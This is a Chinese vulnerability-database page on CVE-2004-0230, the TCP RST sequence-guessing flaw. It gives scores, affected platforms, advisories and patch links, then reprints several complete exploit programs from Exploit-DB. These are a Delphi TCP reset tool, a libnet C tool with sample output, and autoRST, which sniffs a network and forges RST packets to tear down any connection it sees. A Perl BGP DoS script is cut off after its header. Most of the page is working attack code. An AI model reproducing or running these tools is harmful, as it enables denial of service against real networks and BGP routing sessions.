CVE-2004-0230
CVSS5.0
发布时间 :2004-08-18 00:00:00
修订时间 :2016-10-17 22:42:07
NMCOEPS    

[原文]TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP.


[CNNVD]Microsoft Windows TCP连接重置漏洞 (MS05-019/MS06-064)(CNNVD-200408-159)

        
        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的TCP实现中存在拒绝服务漏洞,远程攻击者可能利用此漏洞进行拒绝服务攻击。
        攻击者可以向受影响的系统发送特制的TCP消息导致重置已有的TCP连接。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:oracle:solaris:10
cpe:/o:xinuos:openserver:5.0.6
cpe:/o:netbsd:netbsd:2.0NetBSD 2.0
cpe:/o:oracle:solaris:11
cpe:/a:mcafee:network_data_loss_prevention:8.6
cpe:/o:xinuos:unixware:7.1.1
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/o:xinuos:openserver:5.0.7
cpe:/o:juniper:junosJuniper JUNOS
cpe:/o:xinuos:unixware:7.1.3
cpe:/a:mcafee:network_data_loss_prevention:9.2.1
cpe:/a:openpgp:openpgp:2.6.2
cpe:/o:netbsd:netbsd:1.5.3NetBSD 1.5.3
cpe:/o:netbsd:netbsd:1.6.2NetBSD 1.6.2
cpe:/a:mcafee:network_data_loss_prevention:9.2.0
cpe:/o:netbsd:netbsd:1.5.2NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.6.1NetBSD 1.6.1
cpe:/o:netbsd:netbsd:1.6NetBSD 1.6
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5
cpe:/a:mcafee:network_data_loss_prevention:9.2.2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5711Cisco Systems Spoofed TCP Reset and SYN Denial of Service Vulnerability
oval:org.mitre.oval:def:4791Win2k Large Window Size TCP RST Denial of Service
oval:org.mitre.oval:def:3508WinXP Large Window Size TCP RST Denial of Service
oval:org.mitre.oval:def:270TCP Connection Reset Vulnerability
oval:org.mitre.oval:def:2689Server 2003 Large Window Size TCP RST Denial of Service
oval:gov.nist.fdcc.patch:def:861MS06-064: Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)
oval:gov.nist.USGCB.patch:def:861MS06-064: Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)
oval:org.mitre.oval:def:28134Critical Patch Update January 2015
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0230
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0230
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-159
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2004-006.txt.asc
(VENDOR_ADVISORY)  NETBSD  NetBSD-SA2004-006
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3/SCOSA-2005.3.txt
(VENDOR_ADVISORY)  SCO  SCOSA-2005.3
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.9/SCOSA-2005.9.txt
(VENDOR_ADVISORY)  SCO  SCOSA-2005.9
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.14/SCOSA-2005.14.txt
(VENDOR_ADVISORY)  SCO  SCOSA-2005.14
ftp://patches.sgi.com/support/free/security/advisories/20040403-01-A.asc
(VENDOR_ADVISORY)  SGI  20040403-01-A
http://kb.juniper.net/JSA10638
(VENDOR_ADVISORY)  CONFIRM  http://kb.juniper.net/JSA10638
http://marc.info/?l=bugtraq&m=108302060014745&w=2
(UNKNOWN)  BUGTRAQ  20040425 Perl code exploting TCP not checking RST ACK.
http://marc.info/?l=bugtraq&m=108506952116653&w=2
(UNKNOWN)  HP  SSRT4696
http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml
(UNKNOWN)  CISCO  20040420 TCP Vulnerabilities in Multiple IOS-Based Cisco Products
http://www.kb.cert.org/vuls/id/415294
(VENDOR_ADVISORY)  CERT-VN  VU#415294
http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx
(VENDOR_ADVISORY)  MS  MS05-019
http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx
(VENDOR_ADVISORY)  MS  MS06-064
http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
(VENDOR_ADVISORY)  CONFIRM  http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
http://www.securityfocus.com/archive/1/archive/1/449179/100/0/threaded
(VENDOR_ADVISORY)  HP  SSRT061264
http://www.securityfocus.com/bid/10183
(VENDOR_ADVISORY)  BID  10183
http://www.uniras.gov.uk/vuls/2004/236929/index.htm
(UNKNOWN)  MISC  http://www.uniras.gov.uk/vuls/2004/236929/index.htm
http://www.us-cert.gov/cas/techalerts/TA04-111A.html
(VENDOR_ADVISORY)  CERT  TA04-111A
http://www.vupen.com/english/advisories/2006/3983
(UNKNOWN)  VUPEN  ADV-2006-3983
http://xforce.iss.net/xforce/xfdb/15886
(VENDOR_ADVISORY)  XF  tcp-rst-dos(15886)
https://kc.mcafee.com/corporate/index?page=content&id=SB10053
(VENDOR_ADVISORY)  CONFIRM  https://kc.mcafee.com/corporate/index?page=content&id=SB10053

- 漏洞信息

Microsoft Windows TCP连接重置漏洞 (MS05-019/MS06-064)
中危 设计错误
2004-08-18 00:00:00 2009-03-04 00:00:00
远程  
        
        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的TCP实现中存在拒绝服务漏洞,远程攻击者可能利用此漏洞进行拒绝服务攻击。
        攻击者可以向受影响的系统发送特制的TCP消息导致重置已有的TCP连接。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了安全公告(MS06-064, MS05-019)以及相应补丁:
        MS06-064:Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)
        链接:
        http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx

        MS05-019:Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)
        链接:
        http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx

- 漏洞信息 (276)

MS Windows 2K/XP TCP Connection Reset Remote Attack Tool (EDBID:276)
windows dos
2004-04-22 Verified
0 Aphex
N/A [点击下载]
{
AFX TCP Reset by Aphex
http://www.iamaphex.cjb.net
unremote@knology.net

Compile with Delphi 5/6/7
}

program Project1;

{$APPTYPE CONSOLE}

uses
Windows;

type
TBufferArray = array[0..65535] of byte;

type
iph = record
ip_verlen: byte;
ip_tos: byte;
ip_len: word;
ip_id: word;
ip_offset: word;
ip_ttl: byte;
ip_protocol: byte;
ip_checksum: word;
ip_saddr: longword;
ip_daddr: longword;
end;

tcph = record
th_sport: word;
th_dport: word;
th_seq: longword;
th_ack: longword;
th_len: byte;
th_flags: byte;
th_win: word;
th_checksum: word;
th_upr: word;
end;

sb = packed record
sb1, sb2, sb3, sb4: char;
end;

sw = packed record
sw1, sw2: word;
end;

TInAddr = record
case integer of
0: (ssb: sb);
1: (ssw: sw);
2: (saddr: longint);
end;

TSockAddr = record
case integer of
0: (sin_family: word; sin_port: word; sin_addr: TInAddr; sin_zero: array[0..7] of char);
1: (sa_family: word; sa_data: array[0..13] of char)
end;

TWSAData = record
ver: Word;
hgh: Word;
dsc: array[0..256] of char;
sys: array[0..128] of char;
skt: Word;
udp: Word;
ven: PChar;
end;

function closesocket(sk: integer): integer; stdcall; external 'WS2_32.DLL' name 'closesocket';
function htons(hs: word): word; stdcall; external 'WS2_32.DLL' name 'htons';
function htonl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl';
function ntohl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl';
function inet_addr(cp: pchar): longint; stdcall; external 'WS2_32.DLL' name 'inet_addr';
function sendto(sk: integer; var bf; ln, fl: integer; var ad: TSockAddr; le: integer): 
integer; stdcall; external 'WS2_32.DLL' name 'sendto';
function setsockopt(sk: integer; lv, op: integer; ov: PChar; ol: integer): integer; 
stdcall; external 'WS2_32.DLL' name 'setsockopt';
function socket(af, st, pr: integer): integer; stdcall; external 'WS2_32.DLL' name 'socket';
function WSACleanup: integer; stdcall; external 'WS2_32.DLL' name 'WSACleanup'
function WSAGetLastError: integer; stdcall; external 'WS2_32.DLL' name 'WSAGetLastError';
function WSAStartup(vr: word; var ws: TWSAData): integer; stdcall; external 'WS2_32.DLL' name 'WSAStartup';

const
INVALID_SOCKET = integer(not(0));

var
hSocket: integer;
WindowPos: int64;
WindowCount: dword;
WindowSize: dword;
TargetHost: string;
TargetPort: word;
SourceHost: string;
SourcePort: word;
Odds: dword;
Delay: dword;

function CheckSum(var Buffer; Size: integer): word;
type
TWordArray = Array[0..1] of word;
var
lSumm: LongWord;
iLoop: integer;
begin
lSumm := 0;
iLoop := 0;
while Size > 1 do
begin
lSumm := lSumm + TWordArray(Buffer)[iLoop];
inc(iLoop);
Size := Size - SizeOf(word);
end;
if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]);
lSumm := (lSumm shr 16) + (lSumm and $FFFF);
lSumm := lSumm + (lSumm shr 16);
Result := word(not lSumm);
end;

procedure Header(FromIP: string; FromPort: word; ToIP: string; ToPort: word; Seq: longint; 
Window: longint; var Buffer: TBufferArray; var Socket: TSockAddr; var Size: word);
var
ipHdr: iph;
tcpHdr: tcph;
TcpHeaderLen: word;
ChecksumSize: word;
DataPointer: ^byte;
procedure IncPtr(Value: integer);
begin
DataPointer := pointer(integer(DataPointer) + Value);
end;
begin
Size := sizeof(ipHdr) + sizeof(tcpHdr);
ipHdr.ip_verlen := ((4 shl 4) or sizeof(ipHdr) div sizeof(longword));
ipHdr.ip_tos := 0;
ipHdr.ip_len := htons(Size);
ipHdr.ip_id := 0;
ipHdr.ip_offset := 0;
ipHdr.ip_ttl := 128;
ipHdr.ip_protocol := 6;
ipHdr.ip_checksum := 0;
ipHdr.ip_saddr := inet_addr(pchar(FromIP));
ipHdr.ip_daddr := inet_addr(pchar(ToIP));
ChecksumSize := 0;
tcpHdr.th_sport := htons(FromPort);
tcpHdr.th_dport := htons(ToPort);
tcpHdr.th_seq := htonl(Seq);
tcpHdr.th_ack := htonl(Seq + Window);
tcpHdr.th_len := 80;
tcpHdr.th_flags := 20;
tcpHdr.th_win := Window;
tcpHdr.th_checksum := 0;
tcpHdr.th_upr := 0;
DataPointer := @Buffer[0];
FillChar(Buffer, SizeOf(Buffer), 0);
Move(ipHdr.ip_saddr, DataPointer^, SizeOf(ipHdr.ip_saddr));
IncPtr(SizeOf(ipHdr.ip_saddr));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_saddr);
Move(ipHdr.ip_daddr, DataPointer^, sizeof(ipHdr.ip_daddr));
IncPtr(SizeOf(ipHdr.ip_daddr));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_daddr);
IncPtr(1);
Inc(ChecksumSize);
Move(ipHdr.ip_protocol, DataPointer^, sizeof(ipHdr.ip_protocol));
IncPtr(sizeof(ipHdr.ip_protocol));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_protocol);
TcpHeaderLen := htons(sizeof(tcpHdr));
Move(TcpHeaderLen, DataPointer^, sizeof(TcpHeaderLen));
IncPtr(sizeof(TcpHeaderLen));
ChecksumSize := ChecksumSize + sizeof(TcpHeaderLen);
Move(tcpHdr, DataPointer^, sizeof(tcpHdr));
IncPtr(sizeof(tcpHdr));
ChecksumSize := ChecksumSize + sizeof(tcpHdr);
tcpHdr.th_checksum := CheckSum(Buffer, ChecksumSize);
FillChar(Buffer, sizeof(Buffer), 0);
DataPointer := @Buffer[0];
Move(ipHdr, DataPointer^, sizeof(ipHdr));
IncPtr(sizeof(ipHdr));
Move(tcpHdr, DataPointer^, sizeof(tcpHdr));
Socket.sin_family := 2;
Socket.sin_port := htons(0);
Socket.sin_addr.saddr := inet_addr(pchar(ToIP));
end;

procedure Send(TargetIP: string; TargetPort: integer; SourceIP: string; SourcePort: integer; 
Sequence: longint; Window: longint);
var
Buffer: TBufferArray;
Sck: TSockAddr;
Size: Word;
begin
Header(SourceIP, SourcePort, TargetIP, TargetPort, Sequence, Window, Buffer, Sck, Size);
SendTo(hSocket, Buffer, Size, 0, Sck, sizeof(Sck));
end;

procedure Init;
var
wsdata: TWSAdata;
op: integer;
begin
WSAStartup($0002, wsdata);
hSocket := Socket(2, 3, 0);
op := 1;
SetSockOpt(hSocket, 0, 2, @op, sizeof(op));
end;

function StrToInt(S: string): integer;
begin
Val(S, Result, Result);
end;

procedure DoExit;
begin
WriteLn('AFX TCP Reset');
WriteLn('http://www.iamaphex.cjb.net');
WriteLn('unremote@knology.net');
WriteLn('');
WriteLn('Usage: reset <src ip> <src port> <dest ip> <dest port> <window size> <send delay> [begin seq num]');
ExitProcess(0);
end;

begin
if Length(ParamStr(1)) < 1 then DoExit;
if Length(ParamStr(2)) < 1 then DoExit;
if Length(ParamStr(3)) < 1 then DoExit;
if Length(ParamStr(4)) < 1 then DoExit;
if Length(ParamStr(5)) < 1 then DoExit;
SourceHost := ParamStr(1);
SourcePort := StrToInt(ParamStr(2));
TargetHost := ParamStr(3);
TargetPort := StrToInt(ParamStr(4));
WindowSize := StrToInt(ParamStr(5));
Delay := StrToInt(ParamStr(6));
Randomize;
WindowPos := Random(4294967295);
if Length(ParamStr(7)) > 0 then WindowPos := StrToInt(ParamStr(7));
Odds := 4294967295 div WindowSize;
WindowCount := 0;
Init;
while WindowCount < Odds do
begin
if WindowPos > 4294967295 then WindowPos := 0;
Send(TargetHost, TargetPort, SourceHost, SourcePort, WindowPos, WindowSize);
Inc(WindowCount);
Inc(WindowPos, WindowSize);
Sleep(Delay);
end;
end.

// milw0rm.com [2004-04-22]
		

- 漏洞信息 (291)

TCP Connection Reset Remote Exploit (EDBID:291)
linux remote
2004-04-23 Verified
0 Paul A. Watson
N/A [点击下载]
/*
By: Paul A. Watson
Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1

COMPILE:
gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
or
gcc -o reset-tcp reset-tcp.c -lnet
** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!

EXECUTE:
reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]

EXAMPLE (and timing packets sent with /bin/date):
[root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
Tue Dec 16 21:18:28 CST 2003
Packets sent: 8192 Sequence guess: 536805376
Packets sent: 16384 Sequence guess: 1073676288
Packets sent: 24576 Sequence guess: 1610547200
Packets sent: 32768 Sequence guess: 2147418112
Packets sent: 40960 Sequence guess: 2684289024
Packets sent: 49152 Sequence guess: 3221159936
Packets sent: 57344 Sequence guess: 3758030848
packets sent: 65535
Tue Dec 16 21:18:46 CST 2003
[root@orc BGP]#
*/

/* modified by: J. Barber A.K.A Swoop
modified to use src mac from your interface and asks for the 
destination mac on the command line.

New Command-Line Example:
./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536

swoopafied: 3/30/04
*/

#include <libnet.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
int c;
unsigned long int count=0;
unsigned long int count2=0;
unsigned long int seqguess=0;
unsigned long int seqstart=0;
unsigned long int seqincrement=0;
unsigned long int seqmax=4294967295;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
char * device = argv[1];
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];

char sourceip[32] = "";
char destinationip[32] = "";

/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
struct libnet_ether_addr *ptr_enet_src;
u_char enet_src[6];
u_char enet_dst[6];
u_char org_code[3] = {0x00, 0x00, 0x00};

/* Its only test code, so minimal checking is performed... */
if (argc<8) { 
printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n");
printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] 
[window size]\n",argv[0]); 
printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n");
exit(1);
}

strcpy(sourceip,argv[2]);
src_prt = atoi(argv[3]);
strcpy(destinationip,argv[4]);
dst_prt = atoi(argv[5]);
seqincrement= atoi(argv[7]);
seqstart= 0;
seqmax = 4294967295; /* 2^32 */

payload = NULL;
payload_s = 0;
src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);

memset(enet_dst, 0, sizeof(enet_dst));
sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0],
&enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4],
&enet_dst[5]);

l = libnet_init(LIBNET_LINK,device,errbuf);
ptr_enet_src = libnet_get_hwaddr(l);
memcpy(&enet_src[0], ptr_enet_src,6);
printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3],
enet_src[4],enet_src[5]);
printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3],
enet_dst[4],enet_dst[5]);

for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
count++; count2++;
if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
l = libnet_init(LIBNET_LINK,device,errbuf);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);

t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
c = libnet_write(l);
}
printf("packets sent: %i\n",count);
return (EXIT_FAILURE); 
}		

- 漏洞信息 (24030)

Multiple Vendor TCP Sequence Number Approximation Vulnerability (1) (EDBID:24030)
multiple remote
2004-03-05 Verified
0 Matt Edman
N/A [点击下载]
source: http://www.securityfocus.com/bid/10183/info

A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.

The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. 

Few factors may present viable target implementations, such as imlementations that:

- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports. 

Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms. 

Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. 

Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. 

**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

/******************************************************************************************
 * autoRST
 * Matt Edman - Baylor University
 * 5/3/2004
 *
 * DESCRIPTION:
 * Sniffs out TCP connections on a non-switched network and attempts to reset them
 * by forging a RST packet in the correct window
 *
 * REQUIRED LIBRARIES:
 * -WinPCAP 3.1beta or higher
 * -WinPCAP developer's pack
 *
 * NOTES:
 * Just make sure you have WinPCAP 3.1beta or higher installed and the appropriate
 * winpcap header files downloaded and paths setup. Other than that, just start it
 * up and let it do its job.
 ******************************************************************************************/
#include <stdio.h>

// WinPCAP includes
#include <pcap.h>
#include <remote-ext.h>
 
// 6 byte MAC Address
typedef struct mac_address {
    u_char byte1;
    u_char byte2;
    u_char byte3;
    u_char byte4;
 u_char byte5;
 u_char byte6;
}mac_address;

// 4 bytes IP address
typedef struct ip_address{
    u_char byte1;
    u_char byte2;
    u_char byte3;
    u_char byte4;
}ip_address;

// 20 bytes IP Header
typedef struct ip_header{
    u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits)
    u_char tos; // Type of service
    u_short tlen; // Total length
    u_short identification; // Identification
    u_short flags_fo; // Flags (3 bits) + Fragment offset (13 bits)
    u_char ttl; // Time to live
    u_char proto; // Protocol
    u_short crc; // Header checksum
    ip_address saddr; // Source address
    ip_address daddr; // Destination address
// u_int op_pad; // Option + Padding -- NOT NEEDED!
}ip_header;

// 20 bytes TCP Header
typedef struct tcp_header {
 u_short sport; // Source port
 u_short dport; // Destination port
 u_int seqnum; // Sequence Number
 u_int acknum; // Acknowledgement number
 u_char hlen; // Header length
 u_char flags; // packet flags
 u_short win; // Window size
 u_short crc; // Header Checksum
 u_short urgptr; // Urgent pointer...still don't know what this is...
}tcp_header;

// FUNCTION PROTOTYPES
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data);
void print_packet( u_char *pkt, int len );
void send_reset( mac_address *srcmac, ip_address *srcip, u_short sport, mac_address *destmac, ip_address *destip, u_short dport, u_int seqnum, u_int win );
u_int iptoUINT( ip_address *ip );
u_short csum (unsigned short *buf, int nwords);

// GLOBAL VARIABLES
pcap_t *adhandle; // The device handle
u_int localaddr; // Local IP Address
struct sockaddr_in *lSock; // Local socket structure


int main( int argc, char *argv[] ) {
 pcap_if_t *alldevs;
 pcap_if_t *d;

 int inum;
 int i=0;

 char errbuf[PCAP_ERRBUF_SIZE];
 char *localIP;

 // Get the list of adapters
 if ( pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1 ) {
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
  return 0;
    }

 // Print the list of adapters -- from Winpcap sample code
    for( d = alldevs; d != NULL; d = d->next ) {
        printf("%d. %s", ++i, d->name);
        if ( d->description )
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }
    printf("Enter the interface number (1-%d):",i);
    scanf("%d", &inum);

 // Traverse the list to the selected adapter
    for( d = alldevs, i = 0; i < inum-1; d = d->next, i++);

 // Get the local address
 lSock = (struct sockaddr_in *)(d->addresses->addr);
 localaddr = lSock->sin_addr.S_un.S_addr;
 printf("%d\n", localaddr);

 localIP = inet_ntoa(lSock->sin_addr);
 printf("Local Addr: %s\n", localIP);

 // Open the device for the capture
    if ( (adhandle = pcap_open( d->name,65536, PCAP_OPENFLAG_PROMISCUOUS, 10, NULL, errbuf ) ) == NULL) {
  fprintf(stderr,"\nUnable to open adapter: %s \n", d->name);
        pcap_freealldevs(alldevs);
        return -1;
    }

    printf("\nListening on %s...\n", d->description);
    pcap_freealldevs(alldevs);
    pcap_loop(adhandle, 0, packet_handler, NULL);

 return 0;
}

// CALLBACK function...called for each received packet
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data) {
 u_int ip_len;

 mac_address *srcmac;
 mac_address *destmac;

 ip_header *iph;
 tcp_header *tcph;

 destmac = (mac_address *)pkt_data;
 srcmac = (mac_address *)(pkt_data + 6);

    iph = (ip_header *) (pkt_data + 14);

 if( iph->proto == 0x06 ) { // TCP PACKETS
  if( localaddr != iptoUINT( &iph->saddr ) && localaddr != iptoUINT( &iph->daddr ) ) { // Don't reset our own connection
   ip_len = (iph->ver_ihl & 0xf) * 4;
   tcph = (tcp_header *)(pkt_data + 14 + ip_len);
   if( tcph->flags != 0x04 ) // If the RST flag is already set, no need sending another RST packet
    send_reset( srcmac, &iph->saddr, tcph->sport, destmac, &iph->daddr, tcph->dport, tcph->acknum, tcph->win );
  }
 }
}

// Attempts to forge a RST packet and send it back to the source, resetting the TCP connection
void send_reset( mac_address *srcmac, ip_address *srcip, u_short sport, mac_address *destmac, ip_address *destip, u_short dport, u_int seqnum, u_int win ) {
 u_short tcp_hdrcrc[16];
 u_short ip_hdrcrc[10];
 
 u_short tcp_tos = htons(0x06);
 u_short tcp_hlen = htons(0x14);
 u_short ip_tos = htons(0x0800);

 ip_header iph;
 tcp_header tcph;
 u_char pkt[54];

 printf("Attempting to Reset: %d.%d.%d.%d:%d -> %d.%d.%d.%d:%d\n", srcip->byte1, srcip->byte2, srcip->byte3, srcip->byte4, ntohs(sport),
                  destip->byte1, destip->byte2, destip->byte3, destip->byte4, ntohs(dport));
 
 // Setup IP Header
 iph.ver_ihl = 0x45;
 iph.tos = 0x01;
 iph.tlen = htons(40);
 iph.identification = htons(0x0800);
 iph.flags_fo = 0x0;
 iph.ttl = 0xff;
 iph.proto = 0x06;
 iph.crc = 0x00;
 iph.saddr = *destip; // swap the source & dest ips
 iph.daddr = *srcip;
 
 // Setup TCP Header
 tcph.sport = dport; // swap the source & dest ports
 tcph.dport = sport;
 tcph.seqnum = htonl(ntohl(seqnum) + ntohs(win) - 2);
 tcph.acknum = tcph.seqnum + htonl(0x1);
 tcph.hlen = 0x50;
 tcph.flags = 0x04;
 tcph.win = win;
 tcph.urgptr = 0x00;
 tcph.crc = 0x00;
 
 // Calculate the IP Header Checksum
 memset(ip_hdrcrc, 0, 20);
 memcpy(ip_hdrcrc, &iph, 20);
 iph.crc = csum( ip_hdrcrc, 10 );

 // Construct the tcp pseudo-header for checksum calculation
 memset(tcp_hdrcrc, 0, 32);
 memcpy(tcp_hdrcrc, &tcph, 20);
 memcpy(&tcp_hdrcrc[10], &iph.saddr, 4);
 memcpy(&tcp_hdrcrc[12], &iph.daddr, 4);
 memcpy(&tcp_hdrcrc[14], &tcp_tos, 2);
 memcpy(&tcp_hdrcrc[15], &tcp_hlen, 2);
 tcph.crc = csum( tcp_hdrcrc, 16 );

 // Assemble the packet
 memcpy( pkt, (void *)srcmac, 6 );
 memcpy( (void *)(pkt + 6), (void *)destmac, 6 );
 memcpy( (void *)(pkt + 12), &ip_tos, 2);
 memcpy( (void *)(pkt + 14), &iph, 20 );
 memcpy( (void *)(pkt + 14 + sizeof( ip_header )), &tcph, 20 );
 
 // Send the packet
 if (pcap_sendpacket(adhandle, pkt, sizeof( pkt )) != 0)
  fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));
}

// Calculates the TCP Checksum based on the helper header
u_short csum (unsigned short *buf, int nwords) {
        unsigned long sum=0;
 
  for( sum=0; nwords > 0; nwords-- )
                sum += *buf++;
        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
  return (u_short)~sum;
}

// Takes in an ip_address structure and returns the equivalent 4byte UINT value
u_int iptoUINT( ip_address *ip ) {
 u_int ipaddr;
 ipaddr = ip->byte4 | (ip->byte3 << 8);
 ipaddr = ipaddr | (ip->byte2 << 16);
 ipaddr = ipaddr | (ip->byte1 << 24);
 return htonl(ipaddr);
}

// Display the values in the packet on the screen
void print_packet( u_char *pkt, int len ) {
 int i;

 printf("\tThe Packet\n------------------------------\n");
 for( i = 0; i < len; i++ ) {
  if(i%4==0)
  printf("\n");
  printf("0x%x ", pkt[i]);
 }
 printf("\n");
}		

- 漏洞信息 (24031)

Multiple Vendor TCP Sequence Number Approximation Vulnerability (2) (EDBID:24031)
multiple remote
2004-04-20 Verified
0 Paul A. Watson
N/A [点击下载]
source: http://www.securityfocus.com/bid/10183/info
 
A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.
 
The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.
 
Few factors may present viable target implementations, such as imlementations that:
 
- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.
 
Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.
 
Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.
 
Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.
 
**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

#!/usr/bin/perl
#
# Rich's BGP DOS!
# version .02
